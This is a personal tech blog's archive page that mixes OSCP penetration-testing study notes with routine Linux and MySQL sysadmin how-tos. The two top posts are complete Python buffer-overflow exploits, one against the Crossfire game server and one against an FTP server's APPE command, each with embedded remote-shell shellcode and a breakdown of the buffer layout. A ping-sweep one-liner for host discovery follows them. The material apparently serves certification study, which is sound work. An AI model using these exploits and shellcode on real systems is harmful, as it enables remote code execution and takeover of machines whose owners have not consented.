Matteo Michelini

Sunday, October 10, 2010

OSCP: Linux shellcode

----------------------
#!/usr/bin/python
#exploit for crossfire

import socket, sys

host = sys.argv[1]

# 78 bytes
shellcode =("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80")

# 4379 bytes
#crash = '\x41' * 4368 + '\x42\x42\x42\x42' + '\x43' * 7

# 0807b8f8 - Indirect Jump
crash = '\x90' * 100 + shellcode + '\x41' * 4190 + '\xf8\xb8\x07\x08' + '\x43' * 7

buffer = '\x11(setup sound ' + crash + '\x90\x00#'

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,13327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
----------------------

crash = '\x90' * 100 + shellcode + '\x41' * 4190 + '\xf8\xb8\x07\x08' + '\x43' * 7

\x90 NOPs to the shellcode
\x41 a set of As to fill the space until the EIP address
\xf8\xb8\x07\x08 address to the %eax register where the shellcode is stored
\x43 a set of Cs to fill the 4379 bytes length of the BOF

posted by Matteo at 4:22 PM | 1 comments

Saturday, October 09, 2010

OSCP: shellcode in Win32

---------------------
#!/usr/bin/python

import socket

buffer = 'A' * 2000

shellcode=("\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09"
"\xa3\x87\x03\x83\xeb\xfc\xe2\xf4\xf5\xc9\x6c\x4e\xe1\x5a\x78\xfc"
"\xf6\xc3\x0c\x6f\x2d\x87\x0c\x46\x35\x28\xfb\x06\x71\xa2\x68\x88"
"\x46\xbb\x0c\x5c\x29\xa2\x6c\x4a\x82\x97\x0c\x02\xe7\x92\x47\x9a"
"\xa5\x27\x47\x77\x0e\x62\x4d\x0e\x08\x61\x6c\xf7\x32\xf7\xa3\x2b"
"\x7c\x46\x0c\x5c\x2d\xa2\x6c\x65\x82\xaf\xcc\x88\x56\xbf\x86\xe8"
"\x0a\x8f\x0c\x8a\x65\x87\x9b\x62\xca\x92\x5c\x67\x82\xe0\xb7\x88"
"\x49\xaf\x0c\x73\x15\x0e\x0c\x43\x01\xfd\xef\x8d\x47\xad\x6b\x53"
"\xf6\x75\xe1\x50\x6f\xcb\xb4\x31\x61\xd4\xf4\x31\x56\xf7\x78\xd3"
"\x61\x68\x6a\xff\x32\xf3\x78\xd5\x56\x2a\x62\x65\x88\x4e\x8f\x01"
"\x5c\xc9\x85\xfc\xd9\xcb\x5e\x0a\xfc\x0e\xd0\xfc\xdf\xf0\xd4\x50"
"\x5a\xf0\xc4\x50\x4a\xf0\x78\xd3\x6f\xcb\x96\x5f\x6f\xf0\x0e\xe2"
"\x9c\xcb\x23\x19\x79\x64\xd0\xfc\xdf\xc9\x97\x52\x5c\x5c\x57\x6b"
"\xad\x0e\xa9\xea\x5e\x5c\x51\x50\x5c\x5c\x57\x6b\xec\xea\x01\x4a"
"\x5e\x5c\x51\x53\x5d\xf7\xd2\xfc\xd9\x30\xef\xe4\x70\x65\xfe\x54"
"\xf6\x75\xd2\xfc\xd9\xc5\xed\x67\x6f\xcb\xe4\x6e\x80\x46\xed\x53"
"\x50\x8a\x4b\x8a\xee\xc9\xc3\x8a\xeb\x92\x47\xf0\xa3\x5d\xc5\x2e"
"\xf7\xe1\xab\x90\x84\xd9\xbf\xa8\xa2\x08\xef\x71\xf7\x10\x91\xfc"
"\x7c\xe7\x78\xd5\x52\xf4\xd5\x52\x58\xf2\xed\x02\x58\xf2\xd2\x52"
"\xf6\x73\xef\xae\xd0\xa6\x49\x50\xf6\x75\xed\xfc\xf6\x94\x78\xd3"
"\x82\xf4\x7b\x80\xcd\xc7\x78\xd5\x5b\x5c\x57\x6b\xf9\x29\x83\x5c"
"\x5a\x5c\x51\xfc\xd9\xa3\x87\x03")

# 77D8AF0A
buffer = '\x41' * 966 + '\x0A\xAF\xD8\x77' + '\x43' * 16 + '\x90' * 16 + shellcode + '\x44' * 654

print 'Sending evil buffer....'
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.11.113',21))
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
s.send('APPE ' + buffer + '\r\n')
---------------------

buffer = '\x41' * 966 + '\x0A\xAF\xD8\x77' + '\x43' * 16 + '\x90' * 10 + shellcode

'\x41' * 966 to get EIP
overwrite EIP with JMP ESP from USER32.dll
'\x43' * 16 to get ESP
add some NOPs
put the shellcode

posted by Matteo at 9:00 PM | 0 comments

OSCP: script for host discovery on a LAN

# for ip in $(seq 1 254); do ping -c 1 192.168.10.$ip>/dev/null; [ $? -eq 0 ] && echo "192.168.10.$ip UP" || : ; done


[ $? -eq 0 ] && echo "192.168.10.$ip UP" || :

This is a Ternal Operator
if $? (exit status of the last job) is eq 0 echo otherwise do nothing

posted by Matteo at 12:47 PM | 0 comments

Monday, October 04, 2010

HOWTO Zip Provider1 logs in ziplogs/

# cd /var/opt/CPmds-R70/customers/XXXX/CPsuite-R70/fw1/log/
# mkdir ziplogs
# for i in $(ls | cut -d '_' -f1 | sort -u) ; do if [ $(expr match $i '2010') = 4 ]; then echo zipping $i; tar -cf - $i* | gzip -c > $i.tgz; mv $i.tgz ziplogs/.; rm -rf $i*; fi; done

posted by Matteo at 4:34 PM | 0 comments

Tuesday, July 21, 2009

HOWTO remove files when they are too many for rm -rf *

# for i in *.gz
> do
> echo $i
> rm -rf $i
> done


posted by Matteo at 4:45 PM | 0 comments

Wednesday, January 21, 2009

dnsutils overview

# host -t MX candpartners.com
candpartners.com mail is handled by 10 mail.register.it.

# host -a candpartners.com
Trying "candpartners.com"
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3359
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; QUESTION SECTION:
;candpartners.com. IN ANY

;; ANSWER SECTION:
candpartners.com. 3600 IN NS zeus.csttech.it.
candpartners.com. 3600 IN MX 10 mail.register.it.

;; ADDITIONAL SECTION:
zeus.csttech.it. 3600 IN A 192.168.0.1
mail.register.it. 387 IN A 195.110.124.132

Received 172 bytes from 192.168.0.1#53 in 2 ms

posted by Matteo at 12:51 PM | 0 comments

DBA basic tasks

Importing a dump sql file
# mysql -uroot -proot
mysql> creat database new_db;
mysql> \q
# mysql new_db -uroot -proot < dumpfile.sql

Exporting a dump sql file
# mysqldump -h localhost -uDB_USER -pDB_PASSWD db_name > dump_db.sql

Exporting only sql schema
# mysqldump -d -h localhost -uDB_USER -pDB_PASSWD db_name > dump_db.sql

Setting grants
# mysql
mysql> create database new_db;
mysql> GRANT ALL ON new_db.* TO 'user'@'localhost' IDENTIFIED BY 'user_passwd';
mysql> \q

If you want to enable grants for a remote user (dynamic private IP: network 192.168.0.0/24) use

mysql> GRANT ALL ON new_db.* TO 'user'@'192.168.0.%' IDENTIFIED BY 'user_passwd;

posted by Matteo at 12:31 PM | 0 comments

Saturday, January 10, 2009

HOWTO select keyboard layout in Debian

# dpkg-reconfigure console-data


You can select even Mac layouts

If you don't wanna use the ncurses utility consider that all the keyboard layouts are stored under /usr/share/keymaps
For example if you wanna load the /usr/share/keymaps/i386/qwerty/it.kmap.gz

# loadkeys it

Use only the name without .kmap.gz

posted by Matteo at 4:21 PM | 0 comments

Friday, January 09, 2009

HOWTO use an external display

-- lspci output --
01:00.0 VGA compatible controller: ATI Technologies Inc Mobility Radeon HD 3650
--

# pacman -S xf86-video-radeonhd

-- xorg.conf --
...
Section "Module"
...
Load "dri"
...
EndSection
...
Section "Device"
Identifier "Card0"
Driver "radeonhd"
VendorName "All"
BoardName "All"
Option "AGPMode" "4"
Option "ColorTiling" "on"
Option "AccelMethod" "EXA"
Option "EnablePageFlip" "on"
Option "AGPFastWrite" "yes"
EndSection
...
Section "DRI"
Mode 0666
EndSection
--

# /etc/rc.d/gdm restart

Open a new Terminal in X

$ xrandr -q
Screen 0: minimum 320 x 200, current 1600 x 2000, maximum 2560 x 2560
VGA_1 connected 1600x1200+0+800 408mm x 306mm
...
...
PANEL connected 1280x800+0+0 331mm x 207mm
...
...
$ xrandr --output VGA_1 --mode 1600x1200 --below PANEL

Instead of --below you can use --right-of --above --left-of

posted by Matteo at 3:42 PM | 2 comments